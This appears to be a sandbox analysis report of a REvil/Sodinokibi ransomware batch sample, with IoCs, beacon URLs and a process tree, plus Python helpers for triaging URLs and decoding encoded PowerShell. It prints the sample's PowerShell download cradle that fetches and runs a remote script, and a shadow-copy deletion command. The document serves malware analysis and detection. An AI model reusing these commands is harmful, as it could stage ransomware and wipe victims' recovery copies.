Analysis

Max time kernel: 148s
Max time network: 143s
Platform: windows7_x64
Resource: win7v200430
Submitted: 06-05-2020 04:10

Tasks
  Static task static1
  Behavioral task behavioral1: sample Me1udSVB.bat, resource win7v200430 (the run this report describes)
  Behavioral task behavioral2: sample Me1udSVB.bat, resource win10v200430
General

Target: Me1udSVB.bat
Size: 196 bytes
MD5: 92449589b75088e99026c11efc758a3f
SHA1: 4a9dc4d04a9850b99af10ba65ea589c4ae0565d6
SHA256: f1f555330316b69cf9d50580d41a4b4372689e6d37c90bd945b94140fde7680c
SHA512: b9d4481f45a1acf8a62c195d8a1212d221d3a086fd401a352d349c7ae9b3c9ee31e95d383a0aa6ae03561e8e44dc2acd85c1c76acf6beff68d76d23dd7f4d1be
Malware Config

Extracted: second-stage script URL (the one the .bat passes to PowerShell's download cradle)
  http://185.103.242.78/pastes/Me1udSVB

Extracted from C:\ckg4v-read-me.txt (family: sodinokibi)
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/246EAF4AF2A85C1E
  http://decryptor.cc/246EAF4AF2A85C1E
  Both URLs are the family's payment portal (Tor hidden service and its clearnet mirror) with the per-victim identifier appended. The "ckg4v" prefix of the note is the random per-infection token REvil also appends as the extension of the files it encrypts, so the note name and that extension are the quickest way to scope an infection on other hosts.
Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 1460  powershell.exe

Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Token                     PID   Process
  SeDebugPrivilege          1460  powershell.exe
  SeDebugPrivilege          1460  powershell.exe
  SeDebugPrivilege          320   powershell.exe
  SeBackupPrivilege         1620  vssvc.exe
  SeRestorePrivilege        1620  vssvc.exe
  SeAuditPrivilege          1620  vssvc.exe
  SeTakeOwnershipPrivilege  1460  powershell.exe
  The vssvc.exe rows are the Volume Shadow Copy service enabling its own privileges while it services the shadow-copy deletion requested by PID 320; the privileges enabled in the two PowerShell hosts are the attacker-controlled ones.

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  PID 1460  powershell.exe (3 events)
  PID 320   powershell.exe (2 events)
Makes http(s) request (33 IoCs)
  Contacts server via http/https, possibly for C2 communication.
  Flow  URL
  3     http://185.103.242.78/pastes/Me1udSVB
  10    http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
  12    https://bestbet.com/uploads/temp/hyilje.png
  14    https://hrabritelefon.hr/content/temp/iqhissnw.gif
  16    http://apps.identrust.com/roots/dstrootcax3.p7c
  20    https://pasvenska.se/data/graphic/nwuits.gif
  28    https://patrickfoundation.net/content/images/ajnctd.jpg
  34    https://familypark40.com/data/temp/bett.gif
  42    https://tarotdeseidel.com/data/images/mvjaxf.jpg
  55    https://tsklogistik.eu/wp-content/graphic/rmmdcefo.jpg
  57    https://www.tsklogistik.eu/wp-content/graphic/rmmdcefo.jpg
  59    https://antonmack.de/admin/assets/rxqlyqibqiunhpgi.jpg
  76    https://gaiam.nl/static/image/ciqoxyiz.gif
  85    https://huissier-creteil.com/uploads/pics/qayvdp.jpg
  93    https://101gowrie.com/data/graphic/uwjjfk.gif
  99    https://femxarxa.cat/include/pictures/urzpcnmhds.png
  103   https://vesinhnha.com.vn/news/image/tdcc.png
  105   https://fitnessbazaar.com/news/image/fzbb.jpg
  111   https://juneauopioidworkgroup.org/admin/temp/uxvjtjggsdzo.png
  117   https://smale-opticiens.nl/news/temp/mdlrkc.png
  142   https://allfortheloveofyou.com/data/image/vmipll.jpg
  144   https://triactis.com/admin/pics/sz.jpg
  146   https://www.triactis.com/page-403.php
  148   https://drnice.de/news/assets/rjza.gif
  155   https://eadsmurraypugh.com/data/graphic/cx.png
  157   https://smessier.com/wp-content/assets/qstpmbkipfsk.jpg
  159   https://americafirstcommittee.org/news/game/cnka.jpg
  166   https://geoffreymeuli.com/wp-content/image/ddowqmonmpugjj.gif
  169   https://yourobgyn.net/uploads/game/fkfyys.gif
  176   https://sauschneider.info/content/pictures/mqou.jpg
  181   https://oemands.dk/content/graphic/ihrq.jpg
  183   https://jasonbaileystudio.com/uploads/pics/mjmnupiojiku.jpg
  185   https://allentownpapershow.com/admin/assets/urlo.jpg
  Reading the list: flow 3 is the second-stage script download from the URL in the .bat. Flows 10 and 16 are Windows CryptoAPI fetching trusted-root material (the AuthRoot CTL and the DST Root CA X3 certificate) while validating the TLS chains of the other connections; they correspond to the certificate-store writes recorded below and are not attacker infrastructure. The remaining same-shaped HTTPS URLs (two directory names drawn from fixed word lists, a random lowercase filename, a .jpg/.png/.gif extension) are REvil's post-encryption beacons to the domain list carried in its configuration; those domains are generally legitimate, often compromised, sites that receive encrypted victim statistics and do not control the malware. Flow 146 appears to be the triactis.com site contacted at flow 144 redirecting the beacon to an error page. For hunting, the URL shape and the host list are the useful indicators; do not expect a reply from these hosts to mean anything.
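As an added example (not part of the sandbox report), the following Python sorts a list of such URLs into the stager download, Windows CryptoAPI root fetches, REvil-shaped beacons and everything else. The directory word lists and extensions are the ones documented for the family in public analyses; the CryptoAPI hosts are the two seen in this report; the sample URLs are a subset copied from the table above.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Directory word lists and extensions REvil/Sodinokibi draws from when it builds
# a beacon URL of the form https://<domain>/<dir1>/<dir2>/<random>.<ext>, as
# documented in public analyses of the family.
DIR1 = r"(?:wp-content|static|content|include|uploads|news|data|admin)"
DIR2 = r"(?:images|pictures|image|temp|tmp|graphic|assets|pics|game)"
EXT = r"(?:jpg|png|gif)"
BEACON_RE = re.compile(r"^https://[^/]+/" + DIR1 + "/" + DIR2 + r"/[a-z]+\." + EXT + r"$")

# Hosts Windows CryptoAPI contacted in this report to fetch trusted-root
# material; platform noise, not attacker infrastructure.
CAPI_HOSTS = {"www.download.windowsupdate.com", "apps.identrust.com"}

# Second-stage script URL taken from this sample's .bat command line.
STAGER_URLS = {"http://185.103.242.78/pastes/Me1udSVB"}


def host_of(url: str) -> str:
    """Lower-cased host part of an http(s) URL ('' if it has no scheme)."""
    parts = url.split("/", 3)
    return parts[2].lower() if len(parts) > 2 and parts[1] == "" else ""


def classify(url: str) -> str:
    """Return 'stager', 'capi', 'beacon' or 'other' for one URL."""
    if url in STAGER_URLS:
        return "stager"
    if host_of(url) in CAPI_HOSTS:
        return "capi"
    if BEACON_RE.match(url):
        return "beacon"
    return "other"


def triage(urls: Iterable[str]) -> Tuple[Dict[str, int], List[Tuple[str, str]]]:
    """Classify every URL; return per-class counts and the labelled list."""
    labelled = [(u, classify(u)) for u in urls]
    return dict(Counter(c for _, c in labelled)), labelled


# Subset of the HTTP IoCs from the report above (flow numbers dropped).
SAMPLE_URLS = [
    "http://185.103.242.78/pastes/Me1udSVB",
    "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
    "http://apps.identrust.com/roots/dstrootcax3.p7c",
    "https://hrabritelefon.hr/content/temp/iqhissnw.gif",
    "https://femxarxa.cat/include/pictures/urzpcnmhds.png",
    "https://eadsmurraypugh.com/data/graphic/cx.png",
    "https://tsklogistik.eu/wp-content/graphic/rmmdcefo.jpg",
    "https://geoffreymeuli.com/wp-content/image/ddowqmonmpugjj.gif",
    "https://antonmack.de/admin/assets/rxqlyqibqiunhpgi.jpg",
    "https://www.triactis.com/page-403.php",
]

if __name__ == "__main__":
    counts, labelled = triage(SAMPLE_URLS)
    for url, label in labelled:
        print(f"{label:7} {url}")
    print(counts)
```

Run against the full table above, the classifier yields 29 beacons, 2 CryptoAPI fetches, the stager and one "other" (the page-403.php response). The beacon regex is deliberately strict about scheme, directory names and extension so that an arbitrary image URL on a compromised site is not mistaken for a REvil beacon.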
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
  Process: vssvc.exe (PID 1620)
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  These are the VSS service's own diagnostic keys, written when it starts its writers to service the shadow-copy deletion requested by PID 320. The signature fires because the sample activated VSS, not because it reconfigured a service.
Drops file in System32 directory (1 IoC)
  Process: powershell.exe (PID 1460)
  File opened for modification  C:\Windows\System32\CatRoot2\dberr.txt
  dberr.txt is the catalog-database error log touched during certificate and catalog validation. Attributed to PID 1460, it is most plausibly a side-effect of the certificate-store activity below rather than a payload written to System32; nothing else in this run is dropped there.
Suspicious use of WriteProcessMemory (5 IoCs)
  Source PID  Source process  Target PID  Target process
  1356        cmd.exe         1460        powershell.exe
  1460        powershell.exe  320         powershell.exe
  1460        powershell.exe  320         powershell.exe
  1460        powershell.exe  320         powershell.exe
  1460        powershell.exe  320         powershell.exe
  Each write goes from a parent into the child it is creating, which is the normal CreateProcess pattern; these entries document the cmd.exe -> powershell.exe -> powershell.exe chain, not injection into an unrelated process.
Blacklisted process makes network request (102 IoCs; 64 flows listed, the remainder truncated in the report)
  Process: powershell.exe (PID 1460)
  Flows: 3, 5, 6, 8, 10, 12, 14, 16, 18, 20, 22, 23, 25, 26, 28, 30, 32, 34, 36, 37, 39, 40, 42, 44, 46, 49, 50, 52, 53, 55, 57, 59, 61, 62, 64, 65, 67, 68, 70, 71, 73, 74, 76, 78, 79, 81, 82, 85, 87, 88, 90, 91, 93, 97, 99, 101, 103, 105, 108, 109, 111, 113, 114, 117
  All network activity originates from the first PowerShell host, which is also the process that drops the ransom notes and encrypts files: the second-stage script and the ransomware both execute inside it.
Drops file in Program Files directory (18 IoCs)
  Process: powershell.exe (PID 1460)
  Ransom notes created (5):
    \??\c:\program files\ckg4v-read-me.txt
    \??\c:\program files (x86)\ckg4v-read-me.txt
    \??\c:\program files\microsoft sql server compact edition\ckg4v-read-me.txt
    \??\c:\program files\microsoft sql server compact edition\v3.5\ckg4v-read-me.txt
    \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\ckg4v-read-me.txt
  Files opened for modification (13; the sandbox's seeded user documents being encrypted in place):
    \??\c:\program files\AssertRemove.eps
    \??\c:\program files\ConnectSet.kix
    \??\c:\program files\ConvertFromResize.dotx
    \??\c:\program files\InitializeReceive.css
    \??\c:\program files\InvokeSave.pub
    \??\c:\program files\LockSelect.ppsm
    \??\c:\program files\RegisterDebug.php
    \??\c:\program files\StepConvert.mpeg
    \??\c:\program files\StepSave.dotm
    \??\c:\program files\SuspendRestore.3gp
    \??\c:\program files\SwitchMount.pptm
    \??\c:\program files\TraceBackup.m1v
    \??\c:\program files\UseAssert.svgz
  The encryption runs inside powershell.exe: a note is dropped into each directory the walker visits and the data files found there are opened for write in place. No separate ransomware executable appears on disk in this run.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Process: powershell.exe (PID 1460)
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\k06kzgr9.bmp"
Modifies system certificate store (4 IoCs)
  Process: powershell.exe (PID 1460)
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted)
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (certificate blob omitted)
  Both thumbprints are public root CAs: DAC9024F54D8F6DF94935FB1732638CA6AD77C13 is DST Root CA X3 (matching the dstrootcax3.p7c fetch in flow 16 above) and A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 is DigiCert Global Root CA. Windows' automatic root update caches such roots in AuthRoot the first time a TLS chain needs them, so this is a side-effect of the HTTPS beacons, not the sample planting a rogue root. A planted root would appear under a thumbprint that is not in Microsoft's trusted root program, and usually under the ROOT store rather than AuthRoot.
Processes

C:\Windows\system32\cmd.exe (PID 1356)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Me1udSVB.bat"
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1460, child of 1356)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me1udSVB');Invoke-LHEITCCTUVUCD;Start-Sleep -s 10000"
    Signatures: Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Drops file in System32 directory; Suspicious use of WriteProcessMemory; Blacklisted process makes network request; Drops file in Program Files directory; Sets desktop wallpaper using registry; Modifies system certificate store
    Note: the batch file launches the 32-bit PowerShell host (SysWOW64) by full path on a 64-bit system, pulls the second stage straight into memory with IEX, calls a function that script defines (Invoke-LHEITCCTUVUCD) and then sleeps so the host process stays alive while the payload runs inside it. The second stage is never written to disk.

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 320, child of 1460)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (-e is -EncodedCommand: base64 over UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
      Note: this deletes every volume shadow copy through WMI, removing the chance of recovering previous versions, and is what causes vssvc.exe below to start.

C:\Windows\system32\vssvc.exe (PID 1620)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken; Modifies service
  Note: started on demand by the Service Control Manager to handle the WMI request from PID 320, which is why it appears as a separate root rather than a child of the PowerShell chain.
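Added example, not part of the report: a Python helper that pulls the -EncodedCommand argument out of a PowerShell command line, decodes it the way powershell.exe does (base64 over UTF-16LE) and tags the effective command text with the behaviours seen in this tree: shadow-copy deletion, a download cradle, in-memory execution, and a 32-bit host on a 64-bit system. The command lines are copied from the process tree above; the indicator regexes are written for this example and are not a complete detection rule.

```python
import base64
import binascii
import re
from typing import Dict, NamedTuple, Optional, Tuple

# Command lines copied from the process tree above, keyed by reported PID.
PROCESS_TREE: Dict[int, str] = {
    1356: r'cmd /c "C:\Users\Admin\AppData\Local\Temp\Me1udSVB.bat"',
    1460: r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me1udSVB');Invoke-LHEITCCTUVUCD;Start-Sleep -s 10000"''',
    320: "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==",
}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# short forms seen in practice are listed explicitly here.
ENC_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Behaviours worth flagging in the effective (decoded) command text. These
# patterns are written for this example and are not a complete rule set.
INDICATORS = {
    "shadow_copy_deletion": re.compile(
        r"Win32_Shadowcopy[^;]*Delete\s*\(|vssadmin(?:\.exe)?\s+delete\s+shadows"
        r"|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "in_memory_execution": re.compile(
        r"(?<![\w-])IEX(?![\w-])|Invoke-Expression", re.I),
    "wow64_powershell": re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.I),
}


class Verdict(NamedTuple):
    decoded: Optional[str]   # plaintext of -EncodedCommand if present and valid
    tags: Tuple[str, ...]    # indicator names that matched


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        # Not base64, bad padding, or an odd byte count: not a decodable payload.
        return None


def analyze(cmdline: str) -> Verdict:
    """Decode any encoded payload and tag the command line plus its plaintext."""
    decoded = decode_encoded_command(cmdline)
    effective = cmdline if decoded is None else cmdline + "\n" + decoded
    tags = tuple(name for name, rx in INDICATORS.items() if rx.search(effective))
    if decoded is not None:
        tags += ("encoded_command",)
    return Verdict(decoded, tags)


def analyze_tree(tree: Dict[int, str]) -> Dict[int, Verdict]:
    """Run analyze() over every process in a {pid: cmdline} map."""
    return {pid: analyze(cmd) for pid, cmd in tree.items()}


if __name__ == "__main__":
    for pid, verdict in analyze_tree(PROCESS_TREE).items():
        print(f"PID {pid}: tags={list(verdict.tags)}")
        if verdict.decoded:
            print(f"  decoded: {verdict.decoded}")
```

Tagging the decoded text rather than the raw command line is the point: the shadow-copy deletion in PID 320 is invisible to a string match on the command line as logged, and only appears once the -e argument is decoded. Invalid or truncated base64 is reported as "not decodable" instead of raising, so the helper can run over a whole process log without stopping on the first malformed entry.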